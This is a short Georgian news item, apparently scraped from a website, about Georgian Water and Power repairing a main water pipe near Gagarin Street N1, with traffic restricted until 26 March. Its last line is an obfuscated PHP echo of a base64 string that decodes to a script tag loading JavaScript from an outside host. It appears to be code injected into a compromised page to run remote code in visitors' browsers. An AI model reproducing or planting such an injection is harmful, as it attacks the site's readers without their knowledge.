tube
ავერსი jaluzi
გაგარინის ქუჩა N1-თან, „ჯორჯიან უოთერ ენდ ფაუერის“ წყალსადენის მაგისტრალური მილის დაზიანებულ მონაკვეთზე აღდგენითი სამუშაოები ინტენსიურ რეჟიმში გრძელდება. ამის შესახებ ინფორმაციას „ჯორჯიან უოთერ ენდ ფაუერი“ ავრცელებს.
კომპანიის ცნობით, სამუშაოების მიმდინარეობისას უსაფრთხოების მიზნით სამანქანო მოძრაობა ნაწილობრივ შეზღუდულია გაგარინის ქუჩა N1-დან N9-მდე.
„კომპანიის ტექნიკური ჯგუფების მიერ წყალმომარაგების მილზე აღდგენითი სამუშაოების დასრულებისთანავე მოწესრიგდება გზის საფარი და სამანქანო მოძრაობა 26 მარტს, 02:00 საათზე სრულად აღდგება.
კომპანია „ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მოსახლეობას შექმნილი დისკომფორტისთვის“, – აღნიშნულია ინფორმაციაში.
724
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");